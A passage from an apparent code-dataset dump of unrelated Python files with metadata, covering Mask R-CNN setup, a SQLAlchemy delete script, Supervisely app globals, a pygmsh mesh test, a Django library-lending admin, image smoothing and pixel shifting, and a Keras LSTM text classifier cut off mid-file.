loss_objectness, loss_rpn_box_reg = self.compute_loss(\n # objectness, pred_bbox_deltas, labels, regression_targets)\n # losses = {\n # \"loss_objectness\": loss_objectness,\n # \"loss_rpn_box_reg\": loss_rpn_box_reg,\n # }\n return boxes, losses\n\ndef make_prroi_mask_rcnn(pretrained=True, pretrained_backbone=True, featmap_names=[0, 1, 2, 3], box_output_size=7, mask_output_size=14, **kwargs):\n box_roi_pool = MultiScalePrRoIAlign(\n featmap_names=featmap_names,\n output_size=box_output_size,\n sampling_ratio=None,\n )\n\n mask_roi_pool = MultiScalePrRoIAlign(\n featmap_names=featmap_names,\n output_size=mask_output_size,\n sampling_ratio=None,\n )\n\n model = models.detection.maskrcnn_resnet50_fpn(\n pretrained=pretrained, pretrained_backbone=pretrained_backbone,\n # rpn_nms_thresh=0,\n # rpn_pre_nms_top_n_test=3000,\n # box_score_thresh=0,\n # box_detections_per_img=200,\n # box_nms_thresh=0.2,\n box_roi_pool=box_roi_pool,\n mask_roi_pool=mask_roi_pool,\n **kwargs,\n )\n for param in model.backbone.body.parameters():\n param.requires_grad = False\n model.rpn.forward = MethodType(rpn_forward, model.rpn)\n\n return model\n\nif __name__ == '__main__':\n model = make_prroi_mask_rcnn()\n print(model)\n", "sub_path": "code/segmentation.py", "file_name": "segmentation.py", "file_ext": "py", "file_size_in_byte": 6357, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "prroi_pool.functional._import_prroi_pooling", "line_number": 11, "usage_type": "call"}, {"api_name": "torchvision.ops.poolers.MultiScaleRoIAlign", "line_number": 13, "usage_type": "name"}, {"api_name": "prroi_pool.functional.prroi_pool2d", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nonzero", "line_number": 56, "usage_type": "call"}, {"api_name": "prroi_pool.functional.prroi_pool2d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torchvision.models.detection.maskrcnn_resnet50_fpn", "line_number": 148, "usage_type": "call"}, {"api_name": "torchvision.models.detection", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torchvision.models", "line_number": 148, "usage_type": "name"}, {"api_name": "types.MethodType", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "216811107", "text": "\n'''\nTo delete an item from our database we must follow the following steps:\n\nFind the entry\nSession.delete(Entry)\nSession.commit()\n'''\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom db_setup import Base, MenuItem, Restaurant\n\n\nengine = create_engine(\"sqlite:///restaurantmenu.db\")\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\nspinach = session.query(MenuItem).filter_by(name=\"Spinach Ice Cream\").one()\nsession.delete(spinach)\nsession.commit()", "sub_path": "delete_db.py", "file_name": "delete_db.py", "file_ext": "py", "file_size_in_byte": 523, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", 
"line_number": 14, "usage_type": "call"}, {"api_name": "db_setup.Base.metadata", "line_number": 15, "usage_type": "attribute"}, {"api_name": "db_setup.Base", "line_number": 15, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 16, "usage_type": "call"}, {"api_name": "db_setup.MenuItem", "line_number": 20, "usage_type": "argument"}]} +{"seq_id": "222611155", "text": "import os\nimport sys\nfrom pathlib import Path\n\nimport supervisely_lib as sly\nimport dotenv\n\ndotenv.load_dotenv('./debug.env')\ndotenv.load_dotenv('./secret_debug.env')\n\n\nlogger = sly.logger\n\nmy_app = sly.AppService()\napi = my_app.public_api\n\n\nmodel = None\n\ntask_id = my_app.task_id\nteam_id = os.environ[\"context.teamId\"]\nworkspace_id = os.environ[\"context.workspaceId\"]\ndevice = os.environ['context.deviceId']\n\n\nremote_weights_path = os.environ['modal.state.slyFile']\nremote_embeddings_dir = os.environ['modal.state.slyEmbeddingsDir']\n\nlocal_dataset_path = os.path.join(my_app.data_dir, 'sly_dataset')\nlocal_weights_path = None\n\ndownload_batch_size = os.environ['modal.state.downloadBatchSize']\ncalc_batch_size = os.environ['modal.state.batchSize']\nonly_current_workspace = int(os.environ['modal.state.OnlyCurrentWorkspace']) # 0 or 1\n\n\nroot_source_dir = str(Path(sys.argv[0]).parents[2])\nsys.path.append(os.path.join(root_source_dir, 'src'))\n\n\n# DEBUG\nsly.fs.clean_dir(my_app.data_dir, ignore_errors=True)\n", "sub_path": "supervisely/calculator/sly_globals.py", "file_name": "sly_globals.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 8, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "supervisely_lib.logger", "line_number": 12, "usage_type": "attribute"}, {"api_name": "supervisely_lib.AppService", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "supervisely_lib.fs.clean_dir", "line_number": 42, "usage_type": "call"}, {"api_name": "supervisely_lib.fs", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "335208751", "text": "# -*- coding: utf-8 -*-\nimport pygmsh\n\nfrom helpers import compute_volume\n\n\ndef test():\n geom = pygmsh.opencascade.Geometry(\n characteristic_length_min=1.0, 
characteristic_length_max=1.0\n )\n\n lcar = 1\n h = 25\n w = 10\n length = 100\n # x_fin = -0.5 * length\n cr = 1\n\n f = 0.5 * w\n y = [-f, -f + cr, +f - cr, +f]\n z = [0.0, h - cr, h]\n f = 0.5 * cr\n x = [-f, f]\n points = []\n points.append(geom.add_point((x[0], y[0], z[0]), lcar=lcar))\n points.append(geom.add_point((x[0], y[0], z[1]), lcar=lcar))\n points.append(geom.add_point((x[0], y[1], z[1]), lcar=lcar))\n points.append(geom.add_point((x[0], y[1], z[2]), lcar=lcar))\n points.append(geom.add_point((x[0], y[2], z[2]), lcar=lcar))\n points.append(geom.add_point((x[0], y[2], z[1]), lcar=lcar))\n points.append(geom.add_point((x[0], y[3], z[1]), lcar=lcar))\n points.append(geom.add_point((x[0], y[3], z[0]), lcar=lcar))\n\n lines = []\n lines.append(geom.add_line(points[0], points[1]))\n lines.append(geom.add_circle_arc(points[1], points[2], points[3]))\n\n lines.append(geom.add_line(points[3], points[4]))\n lines.append(geom.add_circle_arc(points[4], points[5], points[6]))\n lines.append(geom.add_line(points[6], points[7]))\n lines.append(geom.add_line(points[7], points[0]))\n\n line_loop = geom.add_line_loop(lines)\n surface = geom.add_plane_surface(line_loop)\n geom.extrude(surface, translation_axis=[length, 0, 0])\n\n points, cells, _, _, _ = pygmsh.generate_mesh(geom)\n\n ref = 24941.503891355664\n assert abs(compute_volume(points, cells) - ref) < 1.0e-2 * ref\n return points, cells\n\n\nif __name__ == \"__main__\":\n import meshio\n\n meshio.write_points_cells(\"opencascade_extrude2.vtu\", *test())\n", "sub_path": "test/test_opencascade_extrude2.py", "file_name": "test_opencascade_extrude2.py", "file_ext": "py", "file_size_in_byte": 1760, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pygmsh.opencascade.Geometry", "line_number": 8, "usage_type": "call"}, {"api_name": "pygmsh.opencascade", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygmsh.generate_mesh", "line_number": 47, "usage_type": "call"}, {"api_name": "helpers.compute_volume", "line_number": 50, "usage_type": "call"}, {"api_name": "meshio.write_points_cells", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "29612986", "text": "from logging import getLogger\n\n\nfrom django.contrib import admin, messages\nfrom django.utils import timezone\n\nfrom opac.admin.messages import AdminMessage, LendingAdminMessage\nfrom opac.models.transactions import Lending\nfrom opac.services import LendingBackService, LendingRenewService, ServiceError\nfrom opac.services.errors import (\n FirstReservationHoldingAlreadyExistsError,\n RenewingAlreadyExistsError,\n ReservationExistsError\n)\n\nlogger = getLogger(__name__)\n\n\nclass LendingAdmin(admin.ModelAdmin):\n list_display = (\n 'get_lending_number',\n 'get_stock_number',\n 'get_book_name',\n 'user',\n 'get_lent_at',\n 'due_date',\n 'get_renewed_due_date',\n 'get_is_not_overdue',\n 'get_is_stock_reserved',\n 'get_is_renewed',\n 'is_renewable'\n )\n search_fields = ('id', 'stock__id', 'stock__book__name', 'user__username')\n raw_id_fields = ('stock', 'user')\n actions = ('renew', 'back')\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def get_queryset(self, request):\n return (\n Lending.objects\n .prefetch_related('renewing')\n .prefetch_related('stock__reservations')\n )\n\n def get_lending_number(self, lending):\n return lending.id\n get_lending_number.admin_order_field = 'id'\n get_lending_number.short_description = '貸出番号'\n\n def get_stock_number(self, 
lending):\n return lending.stock.id\n get_stock_number.admin_order_field = 'stock__id'\n get_stock_number.short_description = '蔵書番号'\n\n def get_book_name(self, lending):\n return lending.stock.book.name\n get_book_name.admin_order_field = 'stock__book__name'\n get_book_name.short_description = '書名'\n\n def get_lent_at(self, lending):\n return timezone.localtime(lending.created_at).date()\n get_lent_at.admin_order_field = 'created_at'\n get_lent_at.short_description = '貸出日'\n\n def get_renewed_due_date(self, lending):\n return lending.renewing.due_date\n get_renewed_due_date.admin_order_field = 'renewing__due_date'\n get_renewed_due_date.short_description = '延長期限'\n\n def get_is_not_overdue(self, lending):\n return not lending.is_overdue()\n get_is_not_overdue.boolean = True\n get_is_not_overdue.short_description = '返却期限内?'\n\n def get_is_stock_reserved(self, lending):\n return 'Yes' if lending.stock.is_reserved() else 'No'\n get_is_stock_reserved.short_description = '予約有り?'\n\n def get_is_renewed(self, lending):\n return 'Yes' if lending.is_renewed() else 'No'\n get_is_renewed.short_description = '延長済み?'\n\n def renew(self, request, lendings):\n try:\n for lending in lendings:\n LendingRenewService(lending).exec()\n except RenewingAlreadyExistsError as e:\n logger.warning('貸出の延長に失敗しました', e)\n self.message_user(\n request,\n LendingAdminMessage.RENEWING_ALREADY_EXISTS,\n level=messages.WARNING\n )\n except ReservationExistsError as e:\n logger.warning('貸出の延長に失敗しました', e)\n self.message_user(\n request,\n LendingAdminMessage.RESERVATION_EXISTS,\n level=messages.WARNING\n )\n except ServiceError as e:\n logger.exception('貸出の延長に失敗しました', e)\n self.message_user(\n request, AdminMessage.ERROR_OCCURRED, level=messages.ERROR)\n else:\n self.message_user(request, LendingAdminMessage.RENEWED)\n renew.short_description = '選択された 貸出 を延長する'\n\n def back(self, request, lendings):\n try:\n for lending in lendings:\n LendingBackService(lending).exec()\n except FirstReservationHoldingAlreadyExistsError as e:\n logger.exception('貸出の返却に失敗しました', e)\n self.message_user(\n request,\n LendingAdminMessage.FIRST_RESERVATION_HOLDING_ALREADY_EXISTS,\n level=messages.WARNING)\n except ServiceError as e:\n logger.exception('貸出の返却に失敗しました', e)\n self.message_user(\n request, AdminMessage.ERROR_OCCURRED, level=messages.ERROR)\n else:\n self.message_user(request, LendingAdminMessage.BACKED)\n back.short_description = '選択された 貸出 を返却する'\n\n\nadmin.site.register(Lending, LendingAdmin)\n", "sub_path": "opac/admin/models/transactions/lending.py", "file_name": "lending.py", "file_ext": "py", "file_size_in_byte": 4652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}, {"api_name": "opac.models.transactions.Lending.objects.prefetch_related", "line_number": 42, "usage_type": "call"}, {"api_name": "opac.models.transactions.Lending.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "opac.models.transactions.Lending", "line_number": 42, "usage_type": "name"}, {"api_name": "django.utils.timezone.localtime", "line_number": 63, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 63, "usage_type": "name"}, {"api_name": "opac.services.LendingRenewService", "line_number": 88, "usage_type": 
"call"}, {"api_name": "opac.services.errors.RenewingAlreadyExistsError", "line_number": 89, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.RENEWING_ALREADY_EXISTS", "line_number": 93, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 93, "usage_type": "name"}, {"api_name": "django.contrib.messages.WARNING", "line_number": 94, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 94, "usage_type": "name"}, {"api_name": "opac.services.errors.ReservationExistsError", "line_number": 96, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.RESERVATION_EXISTS", "line_number": 100, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 100, "usage_type": "name"}, {"api_name": "django.contrib.messages.WARNING", "line_number": 101, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 101, "usage_type": "name"}, {"api_name": "opac.services.ServiceError", "line_number": 103, "usage_type": "name"}, {"api_name": "opac.admin.messages.AdminMessage.ERROR_OCCURRED", "line_number": 106, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.AdminMessage", "line_number": 106, "usage_type": "name"}, {"api_name": "django.contrib.messages.ERROR", "line_number": 106, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 106, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.RENEWED", "line_number": 108, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 108, "usage_type": "name"}, {"api_name": "opac.services.LendingBackService", "line_number": 114, "usage_type": "call"}, {"api_name": "opac.services.errors.FirstReservationHoldingAlreadyExistsError", "line_number": 115, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.FIRST_RESERVATION_HOLDING_ALREADY_EXISTS", "line_number": 119, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 119, "usage_type": "name"}, {"api_name": "django.contrib.messages.WARNING", "line_number": 120, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 120, "usage_type": "name"}, {"api_name": "opac.services.ServiceError", "line_number": 121, "usage_type": "name"}, {"api_name": "opac.admin.messages.AdminMessage.ERROR_OCCURRED", "line_number": 124, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.AdminMessage", "line_number": 124, "usage_type": "name"}, {"api_name": "django.contrib.messages.ERROR", "line_number": 124, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 124, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.BACKED", "line_number": 126, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 126, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 130, "usage_type": "call"}, {"api_name": "opac.models.transactions.Lending", "line_number": 130, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 130, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 130, "usage_type": "name"}]} +{"seq_id": "65121467", "text": "import numpy\nfrom matplotlib import pyplot as plt\nimport smooth_map\n\nshrink_map=True\nif shrink_map:\n #meerkat image is rather big, so shrink 
it down\n meerkat=plt.imread('meerkat.jpg')\n meerkat=meerkat[::2,::2,:]\n meerkat=meerkat[0:2120,0:1400,:]\nelse:\n meerkat=plt.imread('meerkat_small.jpg')\n\nsmoothed_map=numpy.zeros(meerkat.shape)\nunsmoothed_map=numpy.zeros(meerkat.shape)\nnpix_smooth=3.5\nnpix_restore=4\nfor i in range(3):\n tmp=numpy.squeeze(meerkat[:,:,i])\n tmp_smooth=smooth_map.smooth_map(tmp,npix_smooth)\n smoothed_map[:,:,i]=tmp_smooth\n tmp2=smooth_map.smooth_map(tmp_smooth,npix_restore,False)\n unsmoothed_map[:,:,i]=tmp2\n\nif shrink_map:\n plt.imsave('meerkat_small.jpg',meerkat)\nplt.imsave('meerkat_smoothed_' + repr(npix_smooth) + '.jpg',smoothed_map/smoothed_map.max())\nplt.imsave('meerkat_unsmoothed_' + repr(npix_restore) + '.jpg',unsmoothed_map/unsmoothed_map.max())\n\n\n\n\n\n\n#plt.clf()\n#plt.imshow(smoothed_map/smoothed_map.max())\n#plt.savefig('meerkat_smoothed_' + repr(npix_smooth) + '.jpg')\n\n#plt.clf()\n#plt.imshow(unsmoothed_map/unsmoothed_map.max())\n#plt.savefig('meerkat_unsmoothed_' + repr(npix_restore) + '.jpg')\n\n", "sub_path": "fourier_transforms/image_convolution_example_org.py", "file_name": "image_convolution_example_org.py", "file_ext": "py", "file_size_in_byte": 1167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.imread", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imread", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 19, "usage_type": "call"}, {"api_name": "smooth_map.smooth_map", "line_number": 20, "usage_type": "call"}, {"api_name": "smooth_map.smooth_map", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "474036615", "text": "from PIL import Image\nimport numpy as np\nfrom image_utilities import ranges\n\n\ndef parse_args():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--files\", \"-f\", dest=\"files\", default=[\"../demo/nasa--hI5dX2ObAs-unsplash.jpg\"], nargs=\"+\",\n help=\"File(s) to sort. Can be any format supported by PIL. \")\n parser.add_argument(\"--checkerboard\", type=int, default=200,\n help=\"Size of checkerboard pattern.\")\n parser.add_argument(\"--crop_to_fit\", action=\"store_true\",\n help=\"Crops the image to fit the checkerboard pattern.\")\n return parser.parse_args()\n\n\ndef shift_row_wrapped(row: np.ndarray, shift_by: int):\n \"\"\" Shift pixels in row to the right. 
Pixels shifted off the end of the row become the first elements of the row.\n In place.\n\n :param row: The list to modify - pixels will be circularly shifted in place.\n :param shift_by: The amount to shift the elements by to the right (-ve if to the left).\n :return: Nothing: operations are done in place.\n \"\"\"\n\n row_len = row.shape[0]\n shift_by %= row_len\n shift_by = row_len - shift_by\n\n if shift_by == 0:\n return\n\n holding = np.copy(row)\n\n right_part = holding[shift_by:]\n left_part = holding[:shift_by]\n row[:row_len - shift_by] = right_part\n row[row_len - shift_by:] = left_part\n\n\ndef shift_rows_and_cols(image, rows_to_shift, cols_to_shift, shift_rows_by, shift_columns_by):\n \"\"\" Shifts all specified rows and columns (in rows_to_shift and cols_to_shift) by the specified amount. This wraps.\n\n SIDE EFFECTS: Will modify the input image - provide a copy to sort on if this is unwanted.\n\n :param shift_columns_by: How many pixels to shift the specified columns by.\n :param shift_rows_by: How many pixels to shift the specified rows by.\n :param cols_to_shift: The specific columns in the image which should be shifted.\n :param rows_to_shift: The specific rows in the image which should be shifted.\n :param image: The image to modify.\n :return: Nothing. Image is modified in place - user is expected to provide a copy.\n \"\"\"\n\n for row in rows_to_shift:\n shift_row_wrapped(image[row, :], shift_rows_by)\n\n for col in cols_to_shift:\n shift_row_wrapped(image[:, col], shift_columns_by)\n\n\ndef main():\n \"\"\" Program runner: parses the arguments and produces the appropriate images.\"\"\"\n import os\n\n args = parse_args()\n\n for file_name in args.files:\n img = Image.open(file_name)\n pixels = np.copy(np.asarray(img))\n rows, cols, _ = pixels.shape\n\n if args.crop_to_fit:\n rows -= rows % args.checkerboard\n cols -= cols % args.checkerboard\n pixels = pixels[0:rows, 0:cols]\n\n shift_rows_and_cols(pixels, ranges(args.checkerboard, rows), ranges(args.checkerboard, cols),\n 2*args.checkerboard, args.checkerboard)\n\n im = Image.fromarray(pixels)\n im.save(f\"{os.path.splitext(file_name)[0]}_shifted{os.path.splitext(file_name)[-1]}\")\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "ImageMutation/shift_pixels.py", "file_name": "shift_pixels.py", "file_ext": "py", "file_size_in_byte": 3217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.copy", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 70, "usage_type": "call"}, {"api_name": "image_utilities.ranges", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}]} +{"seq_id": "76037922", "text": "from __future__ import print_function\nimport numpy as np\nimport random\nimport sys\nnp.random.seed(1337) # for reproducibility\nfrom keras.datasets import 
reuters\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers.embeddings import Embedding\nfrom keras.callbacks import Callback\nfrom keras.layers.recurrent import LSTM, SimpleRNN, GRU\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Convolution1D, MaxPooling1D\nfrom keras.utils import np_utils\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing import sequence\nfrom pathlib import PurePath\nimport pickle\nimport os\nimport time\nimport json\n\nclass MyHistory(Callback):\t\n\t\n\tdef set_config(self, config):\n\t\tself._config = config\n\t\tself._filename = config.get_filename()\n\n\tdef on_train_begin(self, logs={}):\t\n\t\tprint('results will be stored here:',self._filename)\n\t\tf = open(self._filename,'w')\n\t\tf.write(json.dumps(self._config.__dict__))\n\t\tf.close()\n\n\tdef on_epoch_end(self, epoch, logs={}):\n\t\tf = open(self._filename,'a')\n\t\tf.write(\"\\n{0} : acc = {1} , loss = {2}\".format(epoch,logs['acc'],logs['loss']))\n\t\tf.close()\n\t\t\n\ndef get_vocabulary(file):\n\tclasses = []\n\tf = open(file, 'r')\n\tword_freq = {}\n\tfor line in f:\n\t\tels = line.split('\\t')\n\t\tclasses.append(els[0])\n\t\tfor word in els[1].strip().split(' '):\n\t\t\tif word not in word_freq:\n\t\t\t\tword_freq[word] = 0\n\t\t\tword_freq[word] += 1\n\tword_freq = sorted(word_freq.items(), key=lambda x: (-x[1], x[0]))\n\treturn word_freq,sorted(set(classes))\n\n\ndef load_data_for_generation(file,voc,classes): \n word_index = []\n count=0\n for x in voc:\n word_index.append(x[0])\n count += 1\n \n train_file = open(file,'r')\n X = []\n labels = [] \n # encode the words based on the word_index\n train_file = open(file,'r')\n for line in train_file:\n els = line.split('\\t')\n labels.append(classes.index(els[0]))\n words = []\n for word in els[1].strip().split(' '):\n if word in word_index:\n words.append(word_index.index(word))\n X.append(words) \n return X,labels\n\ndef load_dataset(file,nb_words, test_split=0.2):\n\tif os.path.exists(file):\n\t\tpp = PurePath(file)\n\t\tvoc_file_name = os.path.splitext(file)[0] + '-voc.pkl'\n\t\ttrain_file_name = os.path.splitext(file)[0] + '-rd.pkl'\n\t\tif pp.suffix != '.pkl':\n\t\t\tif not os.path.exists(train_file_name) or not os.path.exists(voc_file_name):\n\t\t\t\tprint('first time loading dataset, generating pickle files')\n\t\t\t\tvoc, classes = get_vocabulary(file)\t\t\t\n\t\t\t\tpickle.dump((voc,classes),open(voc_file_name,'wb'))\n\t\t\t\tX,labels = load_data_for_generation(file,voc,classes)\n\t\t\t\tpickle.dump((X,labels),open(train_file_name,'wb'))\t\n\t\tX,labels = pickle.load(open(train_file_name,'rb'))\n\t\tX = [[1] + [w + 3 for w in x] for x in X]\n\t\tif nb_words is not None and nb_words > 0:\n\t\t\tX = [[2 if (w >= nb_words or w < 0) else w for w in x] for x in X]\n\t\tX_train = np.array(X[:int(len(X) * (1 - test_split))])\n\t\ty_train = np.array(labels[:int(len(X) * (1 - test_split))])\n\n\t\tX_test = np.array(X[int(len(X) * (1 - test_split)):])\n\t\ty_test = np.array(labels[int(len(X) * (1 - test_split)):])\n\t\treturn X_train,y_train,X_test,y_test\n\telse:\n\t\traise Exception('dataset file does not exist')\n\t\t\ndef load_voc(file):\n\tif os.path.exists(file):\n\t\tpp = PurePath(file)\n\t\tvoc_file_name = os.path.splitext(file)[0] + '-voc.pkl'\n\t\tif pp.suffix == '.pkl':\n\t\t\tvoc_file_name = file\n\t\treturn pickle.load(open(voc_file_name,'rb'))\n\traise Exception('vocabulary file not found')\n\ndef 
test_cnn_lstm(config):\t\n\tmax_features = config.embedding_size\t\n\tprint('Loading data...')\n\t\n\tX_train,y_train,X_test,y_test = load_dataset(config.dataset_file,max_features,config.dataset_test_split)\n\tnb_classes = np.max(y_train) + 1\n\t\n\tprint('Vectorizing sequence data...')\n\tX_train = sequence.pad_sequences(X_train)\n\tX_test = sequence.pad_sequences(X_test)\n\tY_train = np_utils.to_categorical(y_train, nb_classes)\n\tY_test = np_utils.to_categorical(y_test, nb_classes)\n\tprint('Build model...')\n\n\tmodel = Sequential()\n\tmodel.add(Embedding(max_features, 128))\n\tif len(config.lstm_layers) == 0:\t\n\t\tmodel.add(LSTM(128))\n\telif len(config.lstm_layers) == 1:\n\t\tmodel.add(LSTM(config.lstm_layers[0]))\n\telse:\n\t\tfor lstm_layer in config.lstm_layers[:-1]:\n\t\t\tmodel.add(LSTM(lstm_layer, return_sequences=True))\n\t\tmodel.add(LSTM(config.lstm_layers[len(config.lstm_layers)-1]))\n\tmodel.add(Dense(nb_classes))\n\tmodel.add(Activation('softmax'))\n\n\tmodel.compile(loss='categorical_crossentropy',\n\t\t\t\toptimizer='adam',\n\t\t\t\tmetrics=['accuracy'])\n\n\tbatch_size = config.batch_size\n\tprint(\"Train...\")\t\n\thistory = MyHistory()\t\n\thistory.set_config(config)\n\tmodel.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=config.nb_epoch, validation_data=(X_test, Y_test),verbose=1, callbacks=[history])\n\t\t\t\n\tscore = model.evaluate(X_test, Y_test, batch_size=batch_size)\n\tprint('Test score:', score)\t\n\tf_write_score = open(config.get_filename(),'a')\n\tf_write_score.write('\\n{0}'.format(str(model.metrics_names)))\n\tf_write_score.write('\\n{0}'.format(str(score)))\n\tf_write_score.close()\n\treturn score, model\n\n\nclass Config:\n\n\tdef __init__(self):\n\t\tself._embedding_size = 40000\n\t\tself._batch_size = 32\n\t\tself._conv_filter_length = 3\n\t\tself._conv_nb_filter = 64\n\t\tself._pool_length = 2\n\t\tself._nb_epoch = 15\n\t\tself._dataset_file = '../datasets/reuters/r52-all-all-terms.txt'\n\t\tself._dataset_test_split = 0.2\n\t\tself._lstm_layers = []\n\t\tself._output_folder = '.results'\n\n\t@property\n\tdef embedding_size(self):\n\t\treturn self._embedding_size\n\t\n\t@embedding_size.setter\t\n\tdef embedding_size(self, size):\n\t\tself._embedding_size = size\n\t\n\t@property\n\tdef batch_size(self):\n\t\treturn self._batch_size\n\t\n\t@batch_size.setter\t\n\tdef batch_size(self, size):\n\t\tself._batch_size = size\n\t\t\n\t@property\n\tdef dataset_file(self):\n\t\treturn self._dataset_file\t\n\t\n\t@dataset_file.setter\t\n\tdef dataset_file(self, file):\n\t\tself._dataset_file = file\n\t\t\n\t@property\n\tdef dataset_test_split(self):\n\t\treturn self._dataset_test_split\t\n\t\n\t@dataset_test_split.setter\t\n\tdef dataset_test_split(self, test_split):\n\t\tself._dataset_test_split = 